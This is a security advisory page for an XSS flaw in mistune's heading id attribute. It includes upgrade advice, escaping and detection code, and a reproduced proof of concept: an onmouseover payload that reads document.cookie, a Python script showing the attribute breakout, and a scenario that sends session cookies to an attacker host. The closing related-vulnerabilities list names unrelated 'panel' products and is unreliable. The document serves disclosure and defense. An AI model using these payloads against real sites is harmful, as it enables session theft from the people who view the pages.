Mistune's HTML renderer writes heading IDs into the id= attribute without escaping, so an attacker who controls heading text can break out of the attribute and inject arbitrary attributes, including JavaScript event handlers. The flaw is reachable only when add_toc_hook() is given a custom heading_id callback that returns attacker-influenced text; the default hook emits safe sequential IDs (toc_1, toc_2, ...). Deriving slug anchors from heading text is the most common use of that callback, so deployments that build human-readable anchors this way are affected. With 463 downstream dependents spanning documentation platforms, wikis, and AI-powered content pipelines, and a working PoC already published, the exploitation bar is low once malicious content reaches a rendered page. Upgrade to mistune 3.2.1, or as an interim workaround pass every heading_id callback return value through html.escape().
What is the risk?
Medium risk overall, elevated in AI/ML deployments where LLM-generated or user-submitted Markdown is rendered with mistune. The vulnerability only activates when a custom heading_id callback is in use, but this is the dominant real-world usage pattern for any documentation or wiki platform. No CISA KEV listing and no active exploitation reported, but the PoC is published and reproducible in minutes. The OpenSSF Scorecard of 5.2/10 and package risk score of 26/100 indicate broader supply chain hygiene concerns beyond this specific issue. Risk compounds in agentic pipelines where AI-generated content is rendered before human review.
What systems are affected?
| Package | Ecosystem | Vulnerable Range | Patched |
|---|---|---|---|
| mistune | pip | <= 3.2.0 | 3.2.1 |
Do you use mistune with a custom heading_id callback? You may be affected.
What should I do?
5 steps:
- Upgrade mistune to 3.2.1 (patched release).
- If immediate upgrade is blocked, wrap any heading_id callback return value with html.escape() before returning it.
- Audit all codebases using add_toc_hook() with a custom heading_id parameter: search for 'add_toc_hook' and 'heading_id' across your dependency tree and application code.
- For detection: review rendered HTML output for unescaped double-quote characters inside id= attributes on heading elements (h1–h6).
- Apply strict Content Security Policy headers (script-src 'self') on all Markdown-rendering endpoints as defense-in-depth to limit XSS blast radius regardless of library version.
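The interim workaround in the second step can be sketched as follows. This is a minimal illustration, not the upstream patch: `slug_heading_id` and `escaped` are hypothetical helper names, and the slug rule (lowercase alphanumerics joined by hyphens) is an assumption chosen for the example. The callbacks follow the `(token, index)` signature used by the advisory's PoC.

```python
import html
import re


def slug_heading_id(token, index):
    """Hypothetical heading_id callback: build a slug, then escape it."""
    text = token.get("text", "")
    # Collapse every run of characters outside [a-z0-9] into one hyphen.
    slug = re.sub(r"[^a-z0-9]+", "-", text.lower()).strip("-")
    # Fall back to a positional ID when nothing usable remains.
    slug = slug or f"toc_{index + 1}"
    # Redundant for this slug alphabet, but keeps the callback safe if the
    # slug rule is later relaxed to allow more characters.
    return html.escape(slug, quote=True)


def escaped(callback):
    """Hypothetical wrapper: escape whatever an existing callback returns."""
    def wrapper(token, index):
        return html.escape(str(callback(token, index)), quote=True)
    return wrapper


def raw_id(token, index):
    # The vulnerable pattern from the PoC: raw heading text as the ID.
    return token.get("text", "")


payload = {"text": 'foo" onmouseover="alert(document.cookie)" x="'}
print(slug_heading_id(payload, 0))
print(escaped(raw_id)(payload, 0))
```

Either callable would be passed as `add_toc_hook(md, heading_id=...)`. If the patched renderer also escapes the ID, the wrapper may double-escape characters such as `&`, so it is best treated as a stopgap until the upgrade lands.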
What does CISA's SSVC say?
Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.
Frequently Asked Questions
Is CVE-2026-44897 actively exploited?
No confirmed active exploitation of CVE-2026-44897 has been reported, but organizations should still patch proactively.
What systems are affected by CVE-2026-44897?
This vulnerability affects the following AI/ML architecture patterns: Documentation generators and portals, RAG pipelines with Markdown rendering, AI chatbot UIs rendering LLM output, ML model card platforms, Interactive notebooks with Markdown cells.
What is the CVSS score for CVE-2026-44897?
CVE-2026-44897 has a CVSS v3.1 base score of 6.1 (MEDIUM). The EPSS exploitation probability is 0.23%.
What is the AI security impact?
MITRE ATLAS Techniques
- AML.T0010.001 AI Software
- AML.T0049 Exploit Public-Facing Application
- AML.T0051.001 Indirect
- AML.T0078 Drive-by Compromise
What are the technical details?
Original Advisory
## Summary

`HTMLRenderer.heading()` builds the opening `<hN>` tag by string-concatenating the `id` attribute value directly into the HTML, with no call to `escape()`, `safe_entity()`, or any other sanitisation function. A double-quote character `"` in the `id` value terminates the attribute, allowing an attacker to inject arbitrary additional attributes (event handlers, `src=`, `href=`, etc.) into the heading element.

The default TOC hook assigns safe auto-incremented IDs (`toc_1`, `toc_2`, …) that never contain user text. However, the `add_toc_hook()` API accepts a caller-supplied `heading_id` callback. Deriving heading IDs from the heading text itself, to produce human-readable slug anchors like `#installation` or `#getting-started`, is by far the most common real-world usage of this callback (every major documentation generator does this). When the callback returns raw heading text, an attacker who controls heading content can break out of the `id=` attribute.

## Details

**File:** `src/mistune/renderers/html.py`

```python
def heading(self, text: str, level: int, **attrs: Any) -> str:
    tag = "h" + str(level)
    html = "<" + tag
    _id = attrs.get("id")
    if _id:
        html += ' id="' + _id + '"'   # ← _id is never escaped
    return html + ">" + text + "</" + tag + ">\n"
```

The `text` body (line content) *is* escaped upstream by the inline token renderer, which is why `text` arrives as `&quot;` etc. But `_id` arrives as a raw string directly from whatever the `heading_id` callback returned; no escaping occurs at any point in the pipeline.

## PoC

**Step 1: Establish the baseline (safe default IDs)**

The script creates a parser with `escape=True` and the default `add_toc_hook()` (no custom `heading_id` callback). The default hook generates sequential numeric IDs:

```python
md_safe = create_markdown(escape=True)
add_toc_hook(md_safe)               # default: heading_id produces toc_1, toc_2, …

bl_src = "## Introduction\n"
bl_out, _ = md_safe.parse(bl_src)
```

Output (the ID is auto-generated, no user text appears in it):

```html
<h2 id="toc_1">Introduction</h2>
```

**Step 2: Add the realistic trigger, a text-based `heading_id` callback**

Deriving an anchor ID from the heading text is the standard real-world pattern (slugifiers, `mkdocs`, `sphinx`, `jekyll` all do this). The PoC uses the simplest possible version, returning the raw heading text unchanged, to show the vulnerability without any extra transformation:

```python
def raw_id(token, index):
    return token.get("text", "")   # returns raw heading text as the ID

md_vuln = create_markdown(escape=True)
add_toc_hook(md_vuln, heading_id=raw_id)
```

**Step 3: Craft the exploit payload**

Construct a heading whose text contains a double-quote followed by an injected attribute:

```
## foo" onmouseover="alert(document.cookie)" x="
```

When `raw_id` is called, `token["text"]` is `foo" onmouseover="alert(document.cookie)" x="`. This is passed verbatim to `heading()` as the `id` attribute value.

**Step 4: Observe attribute breakout in the output**

```python
ex_src = '## foo" onmouseover="alert(document.cookie)" x="\n'
ex_out, _ = md_vuln.parse(ex_src)
```

Actual output:

```html
<h2 id="foo" onmouseover="alert(document.cookie)" x="">foo&quot; onmouseover=&quot;alert(document.cookie)&quot; x=&quot;</h2>
```

Note: the heading **body text** is correctly escaped (`&quot;`), but the **`id=` attribute** is not. A user who moves their mouse over the heading triggers `alert(document.cookie)`. Any JavaScript payload can be substituted.

### Script

A verification script was created to confirm this issue. It writes an HTML page that shows the bypass rendering in the browser.

```python
#!/usr/bin/env python3
"""H2: HTMLRenderer.heading() inserts the id= value verbatim - no escaping."""
import os, html as h
from mistune import create_markdown
from mistune.toc import add_toc_hook


def raw_id(token, index):
    return token.get("text", "")


# --- baseline ---
md_safe = create_markdown(escape=True)
add_toc_hook(md_safe)

bl_file = "baseline_h2.md"
bl_src = "## Introduction\n"
with open(os.path.join(os.getcwd(), bl_file), "w") as f:
    f.write(bl_src)
bl_out, _ = md_safe.parse(bl_src)
print(f"[{bl_file}]\n{bl_src}")
print("[output - id=toc_1, no user content, safe]")
print(bl_out)

# --- exploit ---
md_vuln = create_markdown(escape=True)
add_toc_hook(md_vuln, heading_id=raw_id)

ex_file = "exploit_h2.md"
ex_src = '## foo" onmouseover="alert(document.cookie)" x="\n'
with open(os.path.join(os.getcwd(), ex_file), "w") as f:
    f.write(ex_src)
ex_out, _ = md_vuln.parse(ex_src)
print(f"[{ex_file}]\n{ex_src}")
print("[output - heading_id returns raw text, id= not escaped]")
print(ex_out)

# --- HTML report ---
CSS = """
body{font-family:-apple-system,sans-serif;max-width:1200px;margin:40px auto;background:#f0f0f0;color:#111;padding:0 24px}
h1{font-size:1.3em;border-bottom:3px solid #333;padding-bottom:8px;margin-bottom:4px}
p.desc{color:#555;font-size:.9em;margin-top:6px}
.case{margin:24px 0;border-radius:8px;overflow:hidden;border:1px solid #ccc;box-shadow:0 1px 4px rgba(0,0,0,.1)}
.case-header{padding:10px 16px;font-weight:bold;font-family:monospace;font-size:.85em}
.baseline .case-header{background:#d1fae5;color:#065f46}
.exploit .case-header{background:#fee2e2;color:#7f1d1d}
.panels{display:grid;grid-template-columns:1fr 1fr;background:#fff}
.panel{padding:16px}
.panel+.panel{border-left:1px solid #eee}
.panel h3{margin:0 0 8px;font-size:.68em;color:#888;text-transform:uppercase;letter-spacing:.07em}
pre{margin:0;padding:10px;background:#f6f6f6;border:1px solid #e0e0e0;border-radius:4px;font-size:.78em;white-space:pre-wrap;word-break:break-all}
.rlabel{font-size:.68em;color:#aaa;margin:10px 0 4px;font-family:monospace}
.rendered{padding:12px;border:1px dashed #ccc;border-radius:4px;min-height:20px;background:#fff;font-size:.9em}
"""


def case(kind, label, filename, src, out):
    return f"""
<div class="case {kind}">
  <div class="case-header">{'BASELINE' if kind=='baseline' else 'EXPLOIT'} - {h.escape(label)}</div>
  <div class="panels">
    <div class="panel">
      <h3>Input - {h.escape(filename)}</h3>
      <pre>{h.escape(src)}</pre>
    </div>
    <div class="panel">
      <h3>Output - HTML source</h3>
      <pre>{h.escape(out)}</pre>
      <div class="rlabel">↓ rendered in browser (hover the heading to trigger onmouseover)</div>
      <div class="rendered">{out}</div>
    </div>
  </div>
</div>"""


page = f"""<!DOCTYPE html><html lang="en"><head><meta charset="UTF-8">
<title>H2 - Heading ID XSS</title><style>{CSS}</style></head><body>
<h1>H2 - Heading ID XSS (unescaped id= attribute)</h1>
<p class="desc">HTMLRenderer.heading() in renderers/html.py does html += ' id="' + _id + '"' with no escaping. Triggered when heading_id callback returns raw heading text, the most common doc-generator pattern.</p>
{case("baseline", "Clean heading → sequential id=toc_1, safe", bl_file, bl_src, bl_out)}
{case("exploit", "Malicious heading → quotes break out of id=, onmouseover injected", ex_file, ex_src, ex_out)}
</body></html>"""

out_path = os.path.join(os.getcwd(), "report_h2.html")
# Explicit UTF-8: the report contains non-ASCII characters (↓, →).
with open(out_path, "w", encoding="utf-8") as f:
    f.write(page)
print(f"\n[report] {out_path}")
```

Example Usage:

```bash
python poc.py
```

Once the script is run, open `report_h2.html` in the browser and observe the behaviour.

## Impact

| Dimension | Assessment |
|------------------|-----------|
| **Confidentiality** | Session cookie / auth token theft via JavaScript execution triggered on mouse interaction |
| **Integrity** | DOM manipulation, phishing content injection, forced navigation |
| **Availability** | Page freeze or crash available to attacker |

**Risk context:** This vulnerability targets the most common customisation point for heading IDs. Any documentation site, wiki, or blog engine that generates slug-style anchors from heading text is vulnerable if it uses mistune's `heading_id` callback without independently sanitising the returned value.
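To make the root cause concrete without installing mistune, the concatenation quoted under Details can be reproduced with the standard library alone. The two functions below are illustrative stand-ins: `heading_unescaped` mirrors the quoted logic, and `heading_escaped` shows one plausible fix using `html.escape()`. It is a sketch of the technique, not necessarily what the 3.2.1 patch does.

```python
import html


def heading_unescaped(text, level, _id=None):
    # Mirrors the concatenation quoted in the advisory: _id goes in verbatim.
    tag = "h" + str(level)
    out = "<" + tag
    if _id:
        out += ' id="' + _id + '"'
    return out + ">" + text + "</" + tag + ">\n"


def heading_escaped(text, level, _id=None):
    # Same logic, but the id value is attribute-escaped before insertion.
    tag = "h" + str(level)
    out = "<" + tag
    if _id:
        out += ' id="' + html.escape(_id, quote=True) + '"'
    return out + ">" + text + "</" + tag + ">\n"


payload = 'foo" onmouseover="alert(document.cookie)" x="'
body = html.escape(payload)  # the body text is already escaped upstream

print(heading_unescaped(body, 2, payload))  # attribute breakout
print(heading_escaped(body, 2, payload))    # quotes neutralised as &quot;
```

With escaping applied, the double quotes become `&quot;`, so the whole payload stays inside the `id` value and the browser sees no `onmouseover` attribute.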
Exploitation Scenario
An adversary targeting an AI documentation platform or knowledge base powered by mistune crafts a Markdown document with the heading: '## Getting Started" onmouseover="fetch(atob(base64_encoded_exfil_url)+document.cookie)" x="'. The document is submitted to a wiki, uploaded as a model card, or injected into a RAG document store. When a privileged user — an admin, auditor, or CISO reviewing a compliance report — views the rendered page and moves their cursor over the heading, the injected event handler fires silently, exfiltrating their session token to attacker-controlled infrastructure. In a RAG pipeline context, a poisoned retrieval document could deliver the same payload against a security analyst's browser session when AI-summarized results are displayed.
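A payload like the one in this scenario shows up in rendered output as extra attributes on a heading element, which makes it straightforward to look for. The sketch below uses Python's standard `html.parser` to flag any `h1` to `h6` start tag carrying attributes beyond an allowlist. The allowlist (`id` only) and the names `HeadingAttrScanner` and `scan` are assumptions for illustration; a real deployment may legitimately emit other heading attributes.

```python
from html.parser import HTMLParser

HEADING_TAGS = {"h1", "h2", "h3", "h4", "h5", "h6"}
# Assumed allowlist: attributes a rendered Markdown heading is expected to have.
EXPECTED_ATTRS = {"id"}


class HeadingAttrScanner(HTMLParser):
    """Collects headings that carry attributes outside the allowlist."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag not in HEADING_TAGS:
            return
        extra = [name for name, _ in attrs if name not in EXPECTED_ATTRS]
        if extra:
            # getpos() returns (line, column); the line number is kept.
            self.findings.append((tag, self.getpos()[0], extra))


def scan(html_text):
    """Return a list of (tag, line, unexpected_attribute_names)."""
    scanner = HeadingAttrScanner()
    scanner.feed(html_text)
    scanner.close()
    return scanner.findings


exploit = '<h2 id="foo" onmouseover="alert(document.cookie)" x="">foo</h2>'
print(scan('<h2 id="toc_1">Introduction</h2>'))
print(scan(exploit))
```

Running this over stored or freshly rendered pages gives a quick signal that an attribute breakout has occurred, though it cannot tell whether a payload has already fired.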
Weaknesses (CWE)
CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') (Primary)
The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.
- [Architecture and Design] Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid [REF-1482]. Examples of libraries and frameworks that make it easier to generate properly encoded output include Microsoft's Anti-XSS library, the OWASP ESAPI Encoding module, and Apache Wicket.
- [Implementation, Architecture and Design] Understand the context in which your data will be used and the encoding that will be expected. This is especially important when transmitting data between different components, or when generating outputs that can contain multiple encodings at the same time, such as web pages or multi-part mail messages. Study all expected communication protocols and data representations to determine the required encoding strategies. For any data that will be output to another web page, especially any data that was received from external inputs, use the appropriate encoding on all non-alphanumeric characters. Parts of the same output document may require different encodings, which will vary depending on whether the output is in the: HTML body; element attributes (such as src="XYZ"); URIs; JavaScript sections; Casca…; etc. Note that HTML Entity Encoding is only appropriate for the HTML body. Consult the XSS Prevention Cheat Sheet [REF-724] for more details on the types of encoding and escaping that are needed.
Source: MITRE CWE corpus.
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
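The 6.1 base score can be reproduced from this vector using the CVSS v3.1 base-score equations. The sketch below hard-codes the metric weights and the rounding rule from the v3.1 specification; the function names are illustrative, and only base metrics are handled (no temporal or environmental scoring).

```python
import math

# Metric weights from the CVSS v3.1 specification.
AV = {"N": 0.85, "A": 0.62, "L": 0.55, "P": 0.2}
AC = {"L": 0.77, "H": 0.44}
PR_UNCHANGED = {"N": 0.85, "L": 0.62, "H": 0.27}
PR_CHANGED = {"N": 0.85, "L": 0.68, "H": 0.5}
UI = {"N": 0.85, "R": 0.62}
CIA = {"H": 0.56, "L": 0.22, "N": 0.0}


def roundup(x):
    """Round up to one decimal place, as defined in the v3.1 spec."""
    i = round(x * 100000)
    if i % 10000 == 0:
        return i / 100000.0
    return (math.floor(i / 10000) + 1) / 10.0


def base_score(vector):
    """Compute the base score for a 'CVSS:3.1/...' vector string."""
    m = dict(part.split(":") for part in vector.split("/")[1:])
    changed = m["S"] == "C"
    pr = (PR_CHANGED if changed else PR_UNCHANGED)[m["PR"]]

    # Impact sub-score.
    iss = 1 - (1 - CIA[m["C"]]) * (1 - CIA[m["I"]]) * (1 - CIA[m["A"]])
    if changed:
        impact = 7.52 * (iss - 0.029) - 3.25 * (iss - 0.02) ** 15
    else:
        impact = 6.42 * iss
    if impact <= 0:
        return 0.0

    # Exploitability sub-score.
    exploitability = 8.22 * AV[m["AV"]] * AC[m["AC"]] * pr * UI[m["UI"]]

    total = impact + exploitability
    if changed:
        total *= 1.08
    return roundup(min(total, 10))


print(base_score("CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"))  # 6.1
```

For this vector the impact sub-score is about 2.73 and exploitability about 2.84; the changed scope applies the 1.08 multiplier, giving roughly 6.007, which rounds up to 6.1.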
Related Vulnerabilities
- CVE-2024-13152 (10.0) Mobuy Panel: SQLi allows unauthenticated DB takeover. Same package: panel
- CVE-2026-47744 (9.9) Shopper: RBAC bypass allows full admin takeover. Same package: panel
- CVE-2024-13147 (9.8) B2B Login Panel: SQLi enables unauthenticated DB access. Same package: panel
- CVE-2024-5960 (9.8) Panel: plaintext credential storage enables domain compromise. Same package: panel
- CVE-2025-14014 (9.8) Smart Panel: unauthenticated file upload enables RCE. Same package: panel